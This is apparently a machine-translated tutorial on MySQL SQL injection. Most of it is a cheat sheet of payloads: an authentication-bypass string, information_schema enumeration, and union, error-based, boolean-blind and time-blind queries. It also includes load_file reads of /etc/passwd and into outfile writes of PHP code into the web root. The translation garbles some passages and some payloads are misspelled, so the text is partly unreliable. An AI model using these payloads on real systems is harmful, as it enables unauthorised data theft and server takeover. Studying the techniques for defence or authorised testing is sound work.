What is SQL Injection
The so-called SQL injection attack is that the attacker inserts SQL commands into the input domain of a web form or the query string requested by the page, and deceives the server to execute malicious SQL commands. In some forms, the content entered by the user is directly used to construct (or affect) dynamic SQL commands, or as input parameters for stored procedures, and such forms are particularly vulnerable to SQL injection attacks.
Common comments for mysql
#
--[Space] or --+
/*…*/
During the attention process, these comments may all require urlencode.
MySQL authentication bypass
;%00
‘ or 1=1 #
‘ /*!or */ 1=1 --+
mysql connection character
Use + in mysql to connect.
select * from users where username='zhangsan' and "ab"="a"+"b";
Common functions in mysql
During SQL injection, built-in functions in mysql will be used. Among the built-in functions, they are divided into functions that obtain information and functional functions.
Information functions are used to obtain information about databases in mysql, and functional functions are traditional functions used to complete certain operations.
Commonly used information functions are:
database() , used to obtain the currently used database information
version():Returns the version of the database, equivalent to@@version
user():Returns the current user, equivalent to the current_user parameter. like:
select user(); #root@localhost select current_user; #root@localhost
@@datadir, obtain the storage location of the database.
select @@datadir; #D:\xampp\mysql\data\
Common functional functions are:
load_file():Load the file from the computer and read the data in the file.
select * from users union select 1,load_file('/etc/passwd'),3;
select * from users union select 1,load_file(0x2F6574632F706173737764),3; #use16Bypass single quote limit in the binary system
into outfile:Write to a file, provided that you have write permissions
select '<?php phpinfo(); ?>' into outfile '/var/www/html/'; select char(60,63,112,104,112,32,112,104,112,105,110,102,111,40,41,59,32,63,62) into outfile '/var/www/html/';
concat():Returns the result as the string generated by the concatenation parameter. If one of the parameters is null, the return value is null.
The usage is as follows:
select concat(username,password)from users;
*concat_ws():yesconcat_ws()The first parameter is the delimiter, and the remaining parameter is the field name.
select concat_ws(',',username,password) from users;
group_concat(): Used to merge results in multiple records.
The usage is as follows:
select group_concat(username) from users; #The return isusersAll usernames in the table,And it is returned as a record。
subtring() ,substr():Used to truncate strings. Usage is:substr(str,pos,length) , note that pos starts from 1.
select substr((select database()),1,1);
ascii():Usage returns the ascii value corresponding to the character.
select ascii('a'); #97
length():Returns the length of the string.
like:
select length("123456") #return6
is(exp1,exp2,exp2):If the expression of exp1 is True, then exp2 is returned; otherwise, then exp3 is returned.
like:
select 1,2,if(1=1,3,-1) #1,2,3 selecrt 1,2,if(1=2,3,-1) #1,2,-1
The above are the commonly used functions in SQL injection projects. Of course, there are still some functions that are not used many.
now():Return to the current system time
hex():Returns the hexadecimal of the string
unhex():Hex() in reverse
@@basedir():Reverse mysql installation directory
@@versin_compile_os:operating system
MySQL database meta information
Exist in mysqlinformation_schemaIt is an information database in which all the information of other databases saved by the Mysql server, such as database name, database table, and table field name
and access permissions. existinforma_schemaCommonly used tables are:
schemata:Storing all database information in mysql, and the returned content is the same as the result of show databases.
tables:Storing information about tables in the database. Describe in detail which schema, table type, and table engine a table belongs to.
show The result of tables from secuiry is from this table
columns: Describes in detail all columns of a certain table and the information of each column.
show columns from usersThe result is from this table
The following is to use the above 3 tables to obtain database information.
select database(); #Select databaseselect schema_name from information_schema.schemata limit 0,1 #Query the databaseselect table_name from information_schema.tables where table_schema=database() limit 0,1; #Query Tableselect column_name from information_schema.columns where table_name='users' limit 0,1; #Query column
sql injection type
SQL injection types can be roughly divided into regular SQL injection and SQL blind injection. SQL blind betting can be divided into time-based blind betting and web content-based blind betting.
There are many explanations on the Internet about blind notes on SQL, and there are no too many explanations here. Regarding the concept of blind spots, it is convenient to explain them if there are specific examples.
In delay injection, commonly used functions includeif()andsleep()function.
The basic SQL expression is as follows:
select * from users where id=1 and if(length(user())=14,sleep(3),1); select * from users where id=1 and if(mid(user(),1,1)='r',sleep(3),1);
Wide byte injection
For wide byte injection, you can refer to the detailed explanation of wide byte injection. Wide byte input is generally caused by the mismatch between the web page encoding and the database encoding. For wide byte injection, use %d5 or %df to bypass
Summary of common statements for mysql
Regular injection
1' order by num # Determine the field length1' union select 1,2,3 # Determine the field length-1' union select 1,2,3 # Determine the fields displayed on the page-1' union select 1,2,group_concat(schema_name) from information_schema.schemata #Show all databases in mysql-1' union select 1,2 group_concat(table_name) from information_schema.tables where table_schame = "dbname"/database()/hex(dbname) # -1' union select 1,2,column_name from information_schema.columns where table_name="table_name" limit 0,1 # -1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name="table_name"/hex(table_name) limit 0,1 # -1' union select 1,2,3 AND '1'='1 In case the comments cannot be used
Double SQL check
select concat(0x3a,0x3a,(select database()),0x3a,0x3a); select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.tables group by a; select concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.tables; select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.tables group by a; #This way of writing SQL statements is often used for blind SQL statements. Get the database informationselect count(*),concat(0x3a,0x3a,(select table_name from information_schema.table where table_schema=database() limi 0,1),0x3a,0x3a,floor(rand()*2))a from information_schema.tables group by a; #Get the information about the table of the database #Use postures as follows:1' AND (select 1 from (select count(*),concat(0x3a,0x3a,(select table_name from information_schema.table where table_schema=database() limi 0,1),0x3a,0x3a,floor(rand()*2))a from information_schema.tables group by a)b) --+
This utilization posture is to obtain the required information through the error message when MySQL executes SQL commands. This writing method will be analyzed in detail in the following article.
bool blind
1' and ascii(substr(select database(),1,1))>99 1' and ascii(substr((select table_name from information_schema.tables limit 0,1),1,1))>90
Bool blind accents are based on the SQL statement that the return value is True or False corresponding to the page content will occur to obtain information.
time blind
1' AND select if((select substr(table_name,1,1) from information_schema.tables where table_schema=database() limit 0,1)='e',sleep(10),null) + 1' AND select if(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='e',sleep(10),null) --+
The above two writing methods are equivalent, and the regular SQL injection methods of time blind amnes are different. Time blind acupuncture is usually usedif()andsleep()function. Then, according to the page, return the length of the content, and then knowsleep()Whether the function is executed.
according tosleep()Whether the function is executed to get the required information.
Summarize
The above are the essential basic knowledge for SQL injection. The next article will explain the knowledge in SQL injection in detail through examples. Today's article is mainly used as a basic knowledge. Friends who are interested in SQL injection, please continue to follow me.